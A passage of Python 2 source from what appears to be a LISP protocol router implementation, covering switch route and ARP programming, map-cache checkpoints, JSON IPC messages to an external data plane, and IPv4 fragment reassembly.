route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet, to be used as
# a handle to get the VTEP's MAC address. That MAC address is then a
# handle to tell VXLAN to encapsulate the IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address and associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
#
# The octets from split() are strings, so convert to int before deriving
# the hex values.
#
octet1 = lisp_hex_string(int(rloc_octets[1])).zfill(2)
octet2 = lisp_hex_string(int(rloc_octets[2])).zfill(2)
octet3 = lisp_hex_string(int(rloc_octets[3])).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulate it with a source-port of 4341
# and a destination address and port that were translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface name and next-hop of each IPv4 default route in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
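# For example (hypothetical interfaces and next-hops), a dual-homed system
# with two kernel default routes would return:
#
#   [["eth0", "192.168.1.1"], ["eth1", "10.0.0.1"]]
#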
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
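#
# For example (hypothetical values):
#
#   [1000]10.1.0.0/16 rloc 192.168.1.1 1 50, 192.168.1.2 1 50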
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write database-mapping records to the ipc-data-
# plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr process, write interface records to the ipc-data-plane
# socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return an auth_key{} dictionary where the keys are type integer and the
# values are type string.
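#
# For example (hypothetical), "[3]secret-key" returns {3: "secret-key"} and a
# bare "my-password" returns {0: "my-password"}.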
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
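# For example (hypothetical values), a 1500-byte first fragment queues as
# [0, 1480, <packet>, False] and its 520-byte final fragment queues as
# [1480, 500, <packet>, True].
#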
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialize the list if this is the first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if the first fragment arrived and we determined it is
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr> in
# lisp_crypto_keys_by_rloc_decap{}.
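#
# For example (hypothetical), a key stored under "10.0.0.2:30482" matches
# first; failing that, we fall back to a port-less "10.0.0.2" entry.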
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
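#
# For example (hypothetical), a NAT-translated xTR at 10.0.0.2 using port
# 30482 yields "10.0.0.2:30482"; an xTR in public space yields "10.0.0.2".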
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happens when
# building a new decap entry.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endfor
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is an RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is an RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
